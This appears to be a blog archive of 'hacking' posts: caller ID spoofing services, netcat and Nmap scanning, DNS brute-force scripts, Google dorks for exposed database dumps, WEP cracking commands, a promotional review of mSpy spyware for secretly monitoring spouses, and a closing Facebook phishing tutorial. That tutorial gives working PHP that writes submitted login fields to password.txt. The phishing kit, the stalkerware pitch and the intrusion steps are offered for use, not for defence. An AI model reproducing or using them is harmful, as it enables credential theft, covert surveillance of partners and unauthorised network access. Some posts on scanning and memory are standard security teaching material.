Showing posts with label Hacking. Show all posts
Showing posts with label Hacking. Show all posts

Wednesday, January 22, 2014

5 Websites for Making Fake Calls - Caller ID Spoofing...


Caller ID spoofing is the process of faking your identity while making a call. Read about Caller ID spoofing and learn how it works. There are many websites available which offer free service to make fake calls. With these websites, you can make calls to any one from any one. In this post, we are listing 5 websites for making fake calls:

Warning: Use these websites only for educational purpose. These websites collect logs. If you use it for any illegal work, we will not be responsible for any criminal charge you face.

1. CrazyCall.net

CrazyCall is the most popular website used for call spoofing. Few countries have also blocked the website because of its use in many crimes. This website lets users make calls from any number they want. So, you can make prank calls with this. It also lets users change the voice to be anonymous while calling.

2. SpoofCard

SpoofCard is also a nice service that lets users call from any number. You can call your friends from his number. It also lets you make group calls. For using the service, you need to have credits in your account. You can make demo calls for free, but you need to buy credits for more calls.

3. Spooftel

Spooftel is also a similar kind of caller id spoofing service. Purchase credits and make prank calls. You can also make demo calls to see how the service works. It also has option to change the pitch of your voice. It also has an option to send messages.

4. BluffmyCall

BluffMyCall is another nice call spoofing web service with lots of features. It lets users change caller id, record calls, change voice and leave voice messages. After using your free minutes, you can purchase your minutes.

5. CallerIDFaker

CallerIDFaker comes with better offers. You can get unlimited calling for whole month only for $29.95. Like other services, it also lets users change voice and record calls.

Please use these websites only for playing pranks with friends. You can easily get caught if you use it for illegal work.

Posted By Bergin A10:27 AM

Sunday, September 15, 2013

Port Scanning

Filled under:

Port scanning is the process of checking for open TCP or UDP ports on a machine. Please note that port scanning is considered illegal in many countries and should not be performed outside the labs. I was once running an Nmap scan during an internal penetration test. Unwittingly, I did not take note of the unusual subnet mask employed on the local network, and ended up running the Nmap scan through a remote up link that was offsite. The routers separating these two remote networks were overwhelmed by the intense scan, and, suffice it to say, bad things happened. Never run a port scan blindly. Always think of the traffic implications of your scans, and their possible outcome on the target machines.
Port Scan_Dec 2010
TCP Port Scanning Basics
The theory behind TCP port scanning is based on the three-way TCP handshake. The TCP RFC states that when a SYN is sent to an open port, an ACK should be sent back. So the process of port scanning involves attempting to establish a three-way handshake with given ports. If they respond and continue the handshake, the port is open; otherwise, an RST is sent back. Netcat can be used as a simple port scanner.
The following syntax is used to perform a port scan using Netcat. You’ll scan ports 24–26 on 192.168.0.10:
root@bt:~# nc -vv -z -w2 192.168.0.10 24-26
192.168.0.10: inverse host lookup failed: Unknown host
(UNKNOWN) [192.168.0.10] 26 (?) : Connection refused
(UNKNOWN) [192.168.0.10] 25 (smtp) open
(UNKNOWN) [192.168.0.10] 24 (?) : Connection refused
root@bt:~#
Look at the Wireshark dump that was generated due to this scan:
port-scan

UDP Port Scanning Basics
Since UDP is stateless and does not involve a three-way handshake, the mechanism behind UDP port scanning is different. Try using Wireshark while UDP scanning a lab machine to understand the how UDP port scans work.
Port Scanning Pitfalls
  • UDP port scanning is often unreliable because ICMP packets are often dropped by firewalls and routers. This can lead to false positives in your scan, and you’ll often see UDP port scans showing all UDP ports open on a scanned machine. Please be aware of this.
  • Most port scanners do not scan all available ports and usually have a preset list of “interesting ports” that are scanned.
  • People often forget to scan for UDP services, and stick only to TCP, thereby potentially seeing only half of the equation.

Posted By Bergin A11:18 AM

Little About Nmap

Filled under:


Nmap is probably one of the most comprehensive port scanners to date. Looking at the Nmap usage might be daunting at first. However, once you start scanning you will quickly become accustomed to the syntax. In BackTrack, the Nmap configuration files (such as the default port scan list) are located in /usr/local/share/nmap/.
nmap
Note that when running Nmap as a root user, certain defaults are assumed (SYN scans, for instance). Begin with a simple port scan on 192.168.0.110. Note that running this scan as a root user is actually equivalent to running nmap -sS 192.168.0.110 :
root@bt:~# nmap 192.168.0.110
Starting Nmap 5.21 ( http://www.insecure.org/nmap/ ) at 2010-10-28 16:24 GMT
Interesting ports on 192.168.0.110:
Not shown: 1664 closed ports
PORT STATE SERVICE
21/tcp open ftp
25/tcp open smtp
80/tcp open http
119/tcp open nntp
135/tcp open msrpc
139/tcp open netbios-ssn
443/tcp open https
445/tcp open microsoft-ds
563/tcp open snews

7007/tcp open afs3-bos
MAC Address: 00:0C:29:C6:B3:23 (VMware)
Nmap finished: 1 IP address (1 host up) scanned in 1.524 seconds
root@bt:~#
The scan identified many open ports on 192.168.0.110. Next, try port scanning all of the available ports on this machine by explicitly specifying the ports to be scanned:
root@bt:~# nmap -p 1-65535 192.168.0.110Starting Nmap 5.21 ( http://www.insecure.org/nmap/ ) at 2010-10-28 16:28 GMTInteresting ports on 192.168.0.110:Not shown: 65517 closed portsPORT STATE SERVICE21/tcp open ftp25/tcp open smtp80/tcp open http119/tcp open nntp135/tcp open msrpc139/tcp open netbios-ssn443/tcp open https445/tcp open microsoft-ds563/tcp open snews7007/tcp open afs3-bos8328/tcp open unknown30001/tcp open unknown50203/tcp open unknownMAC Address: 00:0C:29:C6:B3:23 (VMware)Nmap finished: 1 IP address (1 host up) scanned in 3.627 secondsroot@bt:~#
Notice how you’ve discovered some open ports that were not initially scanned because they are not present in the Nmap default port configuration file (/usr/local/share/nmap/nmap-services).

Posted By Bergin A11:15 AM

Dynamic Memory & The Heap

Filled under:


Dynamic Linux Memory
heapIn this article we will take look at how the heap works on the Linux operating system. This includes structure, allocation, functions, clean-up and other important details. Feel free to ask questions in comments as the topics ahead are rather complex compared to that of stack-based memory.
We will go through how dynamic memory differs from stack memory and analyse the aspects of its management.

Memory – The Heap
When memory space is needed and that size is fixed by the programmer, the stack may be the best choice to hold that data. You commonly see functions making use of the stack segment to pass constant sized variables to other called functions, often with the goal of receiving a return value of some sort. Once a function is complete, control is returned to the calling function. Functions that are given memory on the stack have a finite lifetime and use a Last in First out (LIFO) manner of handling itself. For example, the main () function is allocated memory on the stack. As functions are called from main (), the memory is allocated on the stack on top of main () and grows from higher memory addressing towards lower memory addressing. Thus when you are allocating space on the stack, you are actually subtracting the desired amount of space from the ESP register as it grows. The stack has a benefit in where it automatically cleans up after itself once a function is complete. This is not the same as with a heap.
When the data is of a variable amount, must be accessible by multiple functions, is large and/or does not necessarily have a finite lifetime, the heap may be the best location for that data. During program runtime, the loader loads segments of data into memory such as the code segment and data segment. Also created at program runtime are the stack and heap segments. Global and static variables such as that in the .data and .bss segments are often placed after the code segment and before the heap, although it can be argued that these sections are in fact part of the process heap. The kernel requests memory using system calls such as sbrk() and mmap(), These calls allocate a large block of data and do not make the most efficient use of memory, thus we want a way to manage memory more efficiently using something that sits between the program and the system call. In the C programming library there are a group of functions under malloc() that divide up the memory allocated by the system calls brkf), sbrkf) or mmap() into chunks that are more efficient and manageable.
With the heap, allocated memory is not automatically cleaned up as with the stack. The stack has a calling convention that automatically takes care of popping values off the stack and returning control to the calling function. The heap, on the other hand, requires the programmer to call a function to free the memory allocated. Failure to free the memory on the heap can result in problems including memory leakage, resource exhaustion, and fragmentation. When a user opens up a web browser, the developers of the browser have no way of knowing how many tabs the user will open, what types of pages will be visited, how much memory space is required for each site, etc. . It is this that makes the heap a more desirable location for the data than the stack.

Posted By Bergin A11:13 AM

The Phases of an Attack

Filled under:


55Both malicious attackers and professional penetration tester/ ethical hackers apply various phases in their attacks. Attacks are often separated into these phases:

Reconnaissance is the process of investigating target organization to gather information about it from publicly available sources, such as domain registration services, websites, and so on. Some people include techniques such as social engineering and dumpster diving in the recon phase.
Scanning is the process of finding openings in the target organization, such as Internet gateways, wireless access points, available systems, listening ports, and vulnerability lists. In the Exploitation phase, attackers exploit target systems to compromise them, possibly getting control of them or causing a denial of service attack.
While legitimate tests often include the phases listed above, malicious attackers often go further than the rules of engagement allow for a professional penetration test. The next phase, often used by malicious attacker to maintain access and control of a target machine, involves setting up the compromised machine so the attacker can keep control over it, with techniques such as installing backdoors and planting rootkits. Malicious attackers also often use a final phase, Covering the Tracks, in which they employ log editing, file hiding, and covert channels lo hide their activities on a system.
Please note that the best of the attackers (both the good guys and the evil ones) are pragmatists. They don’t always proceed from reconnaissance to scanning to gaining access and so on. Sure, they use these steps, but they are very likely to jump around between them as events and discoveries warrant. For example, during the recon phase, attackers may discover an exploitable flaw that they will use to gain access directly, temporarily bypassing scanning  Then, once they gain access to one machine, they may go back and start scanning.
From a professional testing perspective, though, be careful when jumping out of order between these steps, making sure that you return to the earlier phases to conduct a comprehensive test.

Posted By Bergin A11:12 AM

Google Hacking

Filled under: ,


google-hacking-03Prior to an attack, I spend some time browsing the web and looking for background information about the organization I’m about to attack. First, I usually browse the organizational website and look for general information such as contact information, phone and fax numbers, emails, company structure, and so on. I also usually look for sites that link to the target site or for organizational emails floating around the web. Sometimes the small details give you the most information: how well designed is the target website? How clean is their HTML code? This might give you a clue about their budget when they erected their site, from which, in turn, you may intuit their budget to secure it.

Google has proven to be one of the best and most comprehensive search engines to date. Google will violently spider websites, inadvertently exposing sensitive information on that web site due to various web server misconfigurations (such as directory indexing). Such exposure results in huge amounts of data leaking into the web and, even worse, leaking into the Google cache.
In early 2000 this gave birth to a new field, Google Hacking. Google hacking was first introduced by Johnny Long, who has since published a couple of books about it— a “must read” for any serious Googlenaut. Johnny Long’s book, “Google Hacking For Penetration Testers” can be found on Amazon at: http://www.amzn.com/1931836361.
The general idea behind Google hacking is to use special search operators in Google to narrow down search results and find very specific files, usually with a known format. You can find basic usage information here: http://www.google.com/help/basics.html
Advanced Google Operators The advanced search operators allow you to narrow down your searches even more, and to pinpoint target searches to exactly what you are looking for. A list of Google operators can be found at http://www.google.com/help/operators.html. Using these operators you can search for specific information that might be of value during a pen test.
As a web server owner, I can strongly relate to the following example. I often make backups of my MySQL database because I am a prudent web server owner. The MySQL dumps usually have a .sql suffix, and they usually have the string MySQL dump at the top of the
file. mysql dump filetype:sql
This search reveals all the exposed MySQL backups that have been subjected to Google, and often these dumps contain juicy information like usernames, passwords, emails, credit card numbers, and the like. This information may just be the handle you need to gain access to the server/network.
There are literally hundreds (if not thousands) of interesting searches that can be made, and most of them are listed in the “Google Hacking” section of the Exploit Database. The GHDB organizes these searches into categories such as usernames and passwords, and even rates each search by popularity.`

Posted By Bergin A11:11 AM

Listening on a TCP/UDP Port with Netcat

Filled under:

  •  To listen on port 4444 and accept incoming connections,
type: Computer 1 (local computer – 192.168.8.74)
root@bt:~# nc -lvp 4444
                 listening on [any]4444


  • From a different computer connect to port 4444 on your local machine:
Computer 2 (Windows box – 192.168.9.158)

C:\>nc -v 192.168.8.74 4444
192.168.8.74: inverse host lookup failed: h_errno 11004: NO_DATA
(UNKNOWN) [192.168.8.74] 4444 (?) open
HI, HOW ARE YOU!
fine thanks, you?
I’M DOING GREAT!

Posted By Bergin A11:10 AM

Netcat

Filled under:

Netcat is a wonderfully versatile tool that has been dubbed the “hackers’ Swiss army knife.” The simplest definition of Netcat is “a tool that can read and write to TCP and UDP ports.” This dual functionality suggests that Netcat runs in two modes: client and server.
socat
Connecting to a TCP/UDP port can be useful in several situations:
  • To check if a port is open or closed
  • To read a banner from the port
  • To connect to a network service manually
Please take time to inspect Netcat’s command line options:
root@bt:~# nc -h
[v1.10-38]
connect to somewhere: nc [-options] hostname port[s] [ports] …
listen for inbound: nc -l -p port [-options] [hostname] [port]
options:
-c shell commands as `-e’; use /bin/sh to exec [dangerous!!]
-e filename program to exec after connect [dangerous!!]
-b allow broadcasts
-g gateway source-routing hop point[s], up to 8
-G num source-routing pointer: 4, 8, 12, …
-h this cruft
-i secs delay interval for lines sent, ports scanned
-k set keepalive option on socket
-l listen mode, for inbound connects
-n numeric-only IP addresses, no DNS
-o file hex dump of traffic
-p port local port number
-r randomize local and remote ports
-q secs quit after EOF on stdin and delay of secs
-s addr local source address
-T tos set Type Of Service
-t answer TELNET negotiation
-u UDP mode
-v verbose [use twice to be more verbose]
-w secs timeout for connects and final net reads
-z zero-I/O mode [used for scanning]
port numbers can be individual or ranges: lo-hi [inclusive];
hyphens in port names must be backslash escaped (e.g. ‘ftp\-data’).
root@bt:~#

Posted By Bergin A11:09 AM

Basics Of Web App Attack

Filled under: ,


In this article we’ll define how web applications are associated with network penetration testing and ethical hacking. In this up-front overview, we’ll also define web applications.Some of the most widespread web application vulnerabilities found today are Cross-Site Request Forgery (XSRF), Cross-Site Scripting (XSS), SQL Injection etc,

web_app_layout
In the penetration testing and ethical hacking field, network tests are often considered a separate kind of project from web application tests. The skills associated with each kind of test are, for the most part, distinct and specialized. Some testers focus on network tests, dealing with finding flaws in network-accessible services and clients. Other testers specialize in finding flaws in web applications. A smaller number of testers work both sides, dealing with network tests and web app tests.
Even if you focus exclusively on network penetration tests, you still need to be familiar with various web application vulnerabilities and tools for testing web apps. Sometimes, we are asked in a network test to perform a cursory review of a web app. Other times, we need to interact with web app pen testers to share findings and cooperate in a given attack. And, for some of us, we need to be able to perform both network tests and web app tests.
Before we get into the guts of web application vulnerabilities and testing, let’s start out by defining a web application. There are two fundamental properties that define a web application. First, the web app is accessed via HTTP or and/or HTTPS across the network. Secondly, web apps involve a web server. Those are the only two crucial properties that make a web application a web application.
Most (but not all) web applications involve a browser or related client that sends, receives, and renders HTML via HTTP and/or HTTPS. The browser may be a full-fledged browsing application, such as Internet Explorer or Firefox. Or, it could be a more specialized program, such as the iTunes music player. Furthermore, many (but not all) web apps involve a back end database that stores information for the web application. The most popular database back-ends to web apps are Microsoft SQL Server, Oracle, and MySQL.
Most attacks in the wild today deal with finding flaws in these three components and the way that they interact with each other: the logic of the web application on the web server, the web server and web browser’s interactions, and the web server and database’s interactions.

Posted By Bergin A11:08 AM

Transferring Files with Netcat

Filled under: ,


Netcat can also be used to transfer files, both text and binary, from one computer to another. To send a file from Computer 2 to Computer 1, try the following:
Computer 1: Set up Netcat to listen to and accept the connection and to redirect any input into a file.

root@bt:~# nc -lvp 4444 > output.txt
listening on [any] 4444 …
Computer 2: Connect to the listening Netcat on computer 1 (port 4444) and send the file:

C:\>echo “Hi! This is a text file!” > test.txt
C:\>type test.txt
“Hi! This is a text file!”
C:\>nc -vv 192.168.8.74 4444 < test.txt
192.168.8.74: inverse host lookup failed: h_errno 11004: NO_DATA
(UNKNOWN) [192.168.8.74] 4444 (?) open

Because Netcat doesn’t give any indication of file transfer progress, wait for a few seconds and then
press Ctrl+C to exit Netcat.
On Computer 1 you should see:

root@bt:~# nc -lvp 4444 > output.txt
listening on [any] 4444 …
192.168.9.158: inverse host lookup failed: Unknown server error : Connection timed out
connect to [192.168.8.74] from (UNKNOWN) [192.168.9.158] 1027
^C root@bt:~#

Now check that the file was transferred correctly:
Computer 1
root@bt:~# file output.txt
output.txt: ASCII text, with CRLF line terminators
root@bt:~# cat output.txt
“Hi! This is a text file!”
root@bt:~#

Posted By Bergin A11:06 AM

Forward Lookup Brute Force

Filled under: ,


The idea behind this method is to try to guess valid names of organizational servers by trying to resolve a given name. If the name resolves, the server exists. Here’s a short example using the host command:
root@bt:~# host www.checkpoint.com
www.checkpoint.com has address 216.200.241.66
root@bt:~# host idontexist.checkpoint.com
Host idontexist.checkpoint.com not found: 3(NXDOMAIN)
root@bt:~#
Notice that the DNS name www.checkpoint.com resolved and the host command (which acts as a DNS client) returned the IP address belonging to that FQDN. The name idontexist.checkpoint.com did not resolve and you received a “not found” result.
Taking this idea a bit further, with a bit of bash scripting you can automate the process of discovery. Next, compile a short list of common server names and enter them into a file: dns-names.txt (a more complete list of DNS names is available in /pentest/enumeration/dnsenum/dns.txt):
www
www2
firewall
cisco
checkpoint
smtp
pop3
proxy
dns

You can now write a short bash script (dodns.sh) that will iterate through this list and execute the host command on each line:
#!/bin/bash
for name in $(cat dns-names.txt);do
host $name.checkpoint.com
done
The output of this script is raw and not terribly useful:
root@bt:~# ./dodns.sh
www.checkpoint.com has address 216.200.241.66
Host www1.checkpoint.com not found: 3(NXDOMAIN)
www2.checkpoint.com is an alias for www.checkpoint.com.
www.checkpoint.com has address 216.200.241.66
Host firewall.checkpoint.com not found: 3(NXDOMAIN)
Host cisco.checkpoint.com not found: 3(NXDOMAIN)
Host checkpoint.checkpoint.com not found: 3(NXDOMAIN)
smtp.checkpoint.com is an alias for michael.checkpoint.com.
michael.checkpoint.com has address 194.29.32.68
pop3.checkpoint.com is an alias for michael.checkpoint.com.
michael.checkpoint.com has address 194.29.32.68
Host proxy.checkpoint.com not found: 3(NXDOMAIN)
Host dns.checkpoint.com not found: 3(NXDOMAIN)
Host dns1.checkpoint.com not found: 3(NXDOMAIN)
ns.checkpoint.com has address 194.29.32.199
root@bt:~#
Try cleaning up the output to show only the lines that contain the string “has address”:
#!/bin/bash
for name in $(cat dns-names.txt);do
host $name.checkpoint.com |grep “has address”
done
The output of this script looks much better and shows only hostnames that have been resolved:
root@bt:~# ./dodns.sh
www.checkpoint.com has address 216.200.241.66
www.checkpoint.com has address 216.200.241.66
michael.checkpoint.com has address 194.29.32.68
ns.checkpoint.com has address 194.29.32.199
root@bt:~#
To get a clean list of IPs, you can perform further test manipulation on this output. Cut the list and show only the IP address field:
#!/bin/bash
for name in $(cat dns-names.txt);do
host $name.checkpoint.com |grep “has address”|cut -d” ” -f4
done
The output is now limited to a list of IP addresses:
root@bt:~# ./dodns.sh
216.200.241.66

194.29.32.68
194.29.32.68
root@bt:~#

Posted By Bergin A11:05 AM

DNS Reconnaissance

Filled under: ,


DNS is one of my favorite sources of information gathering. DNS offers a variety of information about public (and sometimes private!) organization servers, such as IP addresses, server names, and server functions.
Interacting with a DNS Server
A DNS server will usually divulge DNS and mail server information for the domain for which it is authoritative. This is a necessity because public requests for mail server addresses and DNS server addresses make up the basic internet experience.
You can interact with a DNS server using various DNS clients such as host, nslookup and dig. Let’s examine nslookup first. By simply typing nslookup, you are put in an nslookup prompt, and you forward any DNS request to the DNS server, which is set up in your TCP/IP settings.
For example:
root@bt:~# nslookup
> www.checkpoint.com
Server: 24.224.127.143
Address: 24.224.127.143#53
Non-authoritative answer:
Name: www.checkpoint.com
Address: 216.200.241.66
>
In this example, you’ve connected to the local DNS server (24.224.127.143) and asked it to resolve the A record for www.checkpoint.com. The DNS server replies with the address 216.200.241.66.
MX Queries
To identify the MX server (mail servers) belonging to an organization, you can simply ask the DNS server to show all the MX records available for that organization’s domain:
> set type=mx
> checkpoint.com
Server: 24.224.127.143
Address: 24.224.127.143#53
Non-authoritative answer:
checkpoint.com mail exchanger = 12 cale.checkpoint.com.
checkpoint.com mail exchanger = 15 usmail-as.zonelabs.com.
Authoritative answers can be found from:
checkpoint.com nameserver = ns8.checkpoint.com.
checkpoint.com nameserver = ns6.checkpoint.com.
cale.checkpoint.com internet address = 194.29.32.199
ns6.checkpoint.com internet address = 194.29.32.199
ns8.checkpoint.com internet address = 216.228.148.29
>
Notice the two mail servers that were listed: mfnbm2 cale.checkpoint.com and usmailas. zonelabs.com. Each server has a “cost” associated with it—12 and 15, respectively. This cost indicates the preference of arrival of mails to the mail servers listed (lower costs are preferred). From this you can assume that cale is the primary mail server and that the other is a backup in case cale fails.
NS Queries
With a similar query, you can identify all the DNS servers authoritative for a domain:
> set type=ns
> checkpoint.com
Server: 24.224.127.143
Address: 24.224.127.143#53
Non-authoritative answer:
checkpoint.com nameserver = ns8.checkpoint.com.
checkpoint.com nameserver = ns6.checkpoint.com.
Authoritative answers can be found from:
ns6.checkpoint.com internet address = 194.29.32.199
ns8.checkpoint.com internet address = 216.228.148.29
This query identifies two DNS servers serving the checkpoint.com domain: ns6 and ns8. This information can be useful later when you attempt to perform zone transfers.

Posted By Bergin A11:03 AM

Sunday, July 21, 2013

How to Hack Wifi Password - Linux

Filled under:


Preview
Today, i'm talking about how to hack wifi password. Recently, i posted first method to hack wifi password but today i'm posted second method to hack wifi password. First of all, you need to read first method of hack wifi password, then read second method. There is many ideas people share how to hack wifi password but not all are working and which is working that is really very tough to understand so not all people can do that cause that is very difficult s so everybody wants to know How To Hack Wifi Password easily there is tricks to hack that wifi password .


How to Hack Wifi Password:
Hack Wifi With Backtrack Linux window


Step 1) Run VMware and open Backtrack iso.
Step 2) Open Shell Consol after start Backtrack.
Step 3) Type airmon-ng and hit enter. It will show you interface, chipset, driver, etc.
Step 4) Type airodump-ng wlan0 and hit enter. Wait a while when it is searching for available connections.
Step 5) You can see a list. Chose a hotspot name you want to hack.
Step 6) Copy the ch value of your selected connection. Then type airdump-ng-c and past ch value just after this. Next to the ch value type –bssid space your bssid number and -w wep_hack wlan0 and press enter.
(Example: airdump-ng-c ch value –bssid 00:1F:9F:73:C0:45 -w wep_hack wlan0)

Step 7) Wait and do not close the window.

Step 8) If this window has finished then open a new shell console and type dir and hit enter.

Step 9) Type aircrack-ng -a 1 –b and your bssid.

(example: aircrack-ng -a 1 -b 00:1F:9F:73:C0:45 wep_hack-01.cpp)

Step 10) If you have seen this text decrypted correctly 100%, it means you have successfully done this process.

Now you can see you desired Wi-Fi password just above this message.

Posted By Bergin A12:48 PM

How to Hack Wifi Password

Filled under:



This is the thing that all want’s to know How To Hack Wifi Password . There is many ideas people share how to hack wifi password but not all are working and which is working that is really very tough to understand so not all people can do that cuase that is very difficult s so everybody wants to know How To Hack Wifi Password easily there is tricks to hack that wifi password . Some software are fake can’t even do anything actually that is virus in your computer so people ask how do i hack wifi there is some method i gonna share with you.
How to Hack Wifi Password:
First of all you need to scan for available wireless networks.
you can use“NetStumbler” or “Kismet” for Windows and Linux and KisMac for Mac.

It’ll also show how the Wi-fi network is encrypted. The two most common encryption techniques are:

1) WEP (Wire Equivalent Privacy )

2) WAP(Wireless Application Protocol)

WEP allows a hacker to crack a WEP key easily whereas WAP is currently the most secure and best option to secure a wi-fi network

It can’t be easily cracked as WEP because the only way to retreive a WAP key is to use a brute-force attack or dictionary atack.

How to Crack WEP :
To crack WEP we will be using Live Linux distribution called BackTrack to crack WEP.

BackTrack have lots of preinstalled softwares but for this time
The tools we will be using on Backtrack are:


  • a)Kismet – a wireless network detector
  • b)airodump – captures packets from a wireless router
  • c)aireplay – forges ARP requests
  • d)aircrack – decrypts the WEP keys

Follow the steps :
1) First of all we have to find a wireless access point along with its bssid, essid and channel number. To do this we will run kismet by opening up the terminal and typing in kismet. It may ask you for the appropriate adapter which in my case is ath0. You can see your device’s name by typing in the command iwconfig.

2) To be able to do some of the later things, your wireless adapter must be put into monitor mode. Kismet automatically does this and as long as you keep it open, your wireless adapter will stay in monitor mode.

3) In kismet you will see the flags Y/N/0. Each one stands for a different type of encryption. In our case we will be looking for access points with the WEP encryption. Y=WEP N=OPEN 0=OTHER(usually WAP).

4) Once you find an access point, open a text document and paste in the networks broadcast name (essid), its mac address (bssid) and its channel number. To get the above information, use the arrow keys to select an access point and hit to get more information about it.

5) The next step is to start collecting data from the access point with airodump. Open up a new terminal and start airodump by typing in the command:

airodump-ng -c [channel#] -w [filename] –bssid [bssid] [device]
In the above command airodump-ng starts the program, the channel of your access point goes after -c , the file you wish to output the data goes after -w , and the MAC address of the access point goes after –bssid. The command ends with the device name. Make sure to leave out the brackets.

6) Leave the above running and open another terminal. Next we will generate some fake packets to the target access point so that the speed of the data output will increase. Put in the following command:

aireplay-ng -1 0 -a [bssid] -h 00:11:22:33:44:55:66 -e [essid] [device]
In the above command we are using the airplay-ng program. The -1 tells the program the specific attack we wish to use which in this case is fake authentication with the access point. The 0 cites the delay between attacks, -a is the MAC address of the target access point, -h is your wireless adapters MAC address, -e is the name (essid) of the target access point, and the command ends with the your wireless adapters device name.

7) Now, we will force the target access point to send out a huge amount of packets that we will be able to take advantage of by using them to attempt to crack the WEP key. Once the following command is executed, check your airodump-ng terminal and you should see the ARP packet count to start to increase. The command is:

aireplay-ng -3 -b [bssid] -h 00:11:22:33:44:5:66 [device]
In this command, the -3 tells the program the specific type of attack which in this case is packet injection, -b is the MAC address of the target access point, -h is your wireless adapters MAC address, and the wireless adapter device name goes at the end.
Once you have collected around 50k-500k packets, you may begin the attempt to break the WEP key. The command to begin the cracking process is:

aircrack-ng -a 1 -b [bssid] -n 128 [filename].ivs
In this command the -a 1 forces the program into the WEP attack mode, the -b is the targets MAC address,and the -n 128 tells the program the WEP key length. If you don’t know the -n , then leave it out. This should crack the WEP key within seconds. The more packets you capture, the bigger chance you have of cracking the WEP key.

Posted By Bergin A12:46 PM

Monday, July 15, 2013

Download Certified Ethical Hacker Ebook

Filled under: , ,


Preview

In this post i am providing you an ebook which can turn you into an ethical hacker.The actual objective of the ethical hacker training course would be to assist you to learn a repeatable, documentable penetration testing strategy which you can use within an ethical penetration testing or hacking scenario.

This ethical security training program features a substantial Return on Investment, you go out the doorway along with hacking abilities which are extremely sought after, along with the Certified Ethical Hacker accreditation!

An ethical hacker is generally hired by a company who trusts him / her to try and penetrate systems and personal computers, utilizing the exact same techniques like a hacker, with regards to getting as well as repairing personal computer protection weaknesses. Illegal hacking (i.e., getting entry to computer systems without having earlier consent from owner) is really a criminal offense in many nations, however penetration tests made by demand of the owner of the aimed system(s) or network(s) is not really.

A Certified Ethical Hacker has acquired a documentation in the way to search for the weak points as well as weaknesses in target devices and utilizes the identical information and equipment like a hacker.




Certified Ethical Hacker Volume-I
Preview

Certified Ethical Hacker Volume-II
Preview

Posted By Bergin A11:11 AM

Monday, June 17, 2013

mSpy | Software Review

Filled under:


Preview
mSpy is one of the most popular and top rated cell spy software meant for mobile phones as well as computers. This invaluable application features a portfolio of solutions for monitoring your family members, business partners as well as employees. The security feature of this software platform ensures the safety of your cell phone and the entire personal and confidential information stored in it. mSpy can compatibly work with most popular kinds of  smartphones, android, blackberry, iPhone, Symbian and Windows Mobile. Once installed in a cell phone, this program can track the mobile phone activities of the user of the phone and inform you all of that precisely. The most effective logging and reporting features of this software has made it highly popular among millions of people using mobile tracking software.

Who will require mSpy?
Those with a need of knowing the truth behind personal and business interactions can just install mSpy mobile sms spy on the target cell phone and monitor the entire range of activities happening through it. This is an invaluable tool for you to catch your cheating spouse, watch over your kids for their misbehaviors and nab your employees when they go wrong or engage in inappropriate activities.
The Wonderful Advantages of mSpy
Easy Installation: The whole process of installing this tracking software only takes about 15 minutes to complete. This can be done without giving room to any suspicions. The installation procedure is detailed in the user manual.
Protecting the Safety of the Phone: Every spying software must be able to work secretly. mSpy will not leave even a trace of information of indication for the user to discover or even doubt that it has been installed on their phone.
Remote access Capability: After the physical installation, you need not touch the phone by hand. You can monitor it from a remote user account.
Number of Plans to Choose: Based on the monitoring needs of the buyer, there are a number of plans to choose from. Therefore, this program offers enough amount of flexibility with respect to budget and functionality. The user-friendly interface and 10 days money back guarantee are the other attractive features.

The Various Monitoring features of MSpy
1. GPS tracker: The GPS tracker feature can track the exact location of the cell phone and fix it on the maps.
2. Email reading: The program can record all the emails sent and received by the device.
3. SMS tracking: The complete details of all the SMS and text conversations can be recorded.
4. Call tracking: All inbound and outbound calls pertaining to the target phone can be logged with time and duration details. Subscribers can also record and listen to conversations in real time.
5. Internet history: You can have the complete log of the websites visited through the cell phone’s browser even after the history is deleted from the target mobile.
6. Blocking Applications: You can block some websites from being visited from the target mobile to protect the interests of your kids.
7. Accessing photos and videos and phone book: You can enjoy an unrestricted access to the contacts, photos and videos stored on the target phone.
8. SMS commands: From a remote location, you can issue commands to lock your phone that is stolen or lost. You can also use this feature to take a data back up or delete the informati0n stored in it.
9. SIM change Notification: if the SIm of the target mobile is changed, the program sends an SMS alert to notify you of the same.
10. Keystrokes recording: The inbuilt key logger capability records the keystrokes of the mobile in real time.
11. Reverse phone lookup facility: Most unique to mSpy, the reverse phone look up feature enables the subscriber track the person using the number irrespective of whether it belongs to a mobile or a fixed landline.

mSpy’s sophisticated surveillance tools can spy all the activities of a mobile phone or computer thereby offering the complete portfolio of monitoring solutions. For further information, please, visit http://www.mspy.com/.

Posted By Bergin A9:33 PM

How To Print Out A List Of All Files In A Folder

Filled under: ,

 Preview
In this simple tutorial, I´ll show you how to print out a list of files in a folder. There is plenty of shareware programs which can do this, but I think that the simplest way to do this is with using Command Promt ( cmd).

1. Go to Start, then click Run. In Run option type cmd and click OK.
2. After this will open cmd.exe ,find folder which you want to print out with cmd, If you do not know how to move through the directories using cmd, see this post: How to find directories with cmd.
3. When you find specified folder, with this command dir > list.txt, you´ll create text document with list of files.
Preview
Example:
I want to print list of all files in folder with path E:\movies
In cmd I´ll write E: and press enter , then write cd and with TAB find folder movies and press enter . Then write dir > list.txt In folder with path E:\movies I will find text document list. txt . Open that text document and print out. It looks like this

After this list.txt created in E:movies

List.txt looks like this
Preview
]
Preview



Posted By Bergin A9:33 PM

Best Alternative If Command Prompt Is Blocked

Filled under: ,

Most of the computers that have public access to people has Command Prompt blocked. This is for security reasons. Some time you  may want to view hidden files in the public computer using command prompt (in case Folder options settings is not available). Lack of Command Prompt will be great loss of if you want to hack in to the networking or the same pc.
There are several tweaks and hacks to enable command prompt, but it is so much tricky. I am introducing you with a nice alternative for command prompt.
Have a look at the screenshot. It supports all the features that Command Prompt does. Even all the wild cards that can be used in DOS(Disk Operating System).

Download it from here:
http://www.gammadyne.com/gs.exe
It is actually a DOS Shell, which interpets user command same as in DOS.

Posted By Bergin A9:30 PM

Facebook Phishing

Filled under: ,



Hack Facebook Account with Phishing



Needed Files :
phishing.php
password.txt
facebook.html

Phishing.php

>> Open Notepad and paste the Following code in notepad.


<?php
header ('Location: https://www.facebook.com/login.php?login_attempt=1 ');
$handle = fopen("password.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>

>> Save this File With phishing.php


Password.txt

>> Now, Open notepad again and save it with password.txt


Facebook.html

>> Now Goto facebook.com right click on the login page and click on "view source code"


>> Select All code Copy and paste it in another notepad file. And save it as facebook.html

>> Now Open Facebook.html in notepad, press ctrl+f and find the following link

https://www.facebook.com/login.php?login_attempt=1

Replace it with phishing.php and close this file after saving.

Now We have 3 Files
1) Phishing.php
2) Password.txt
3) Facebook.html

Now You have to upload this three File in any free web Hosting site Like,
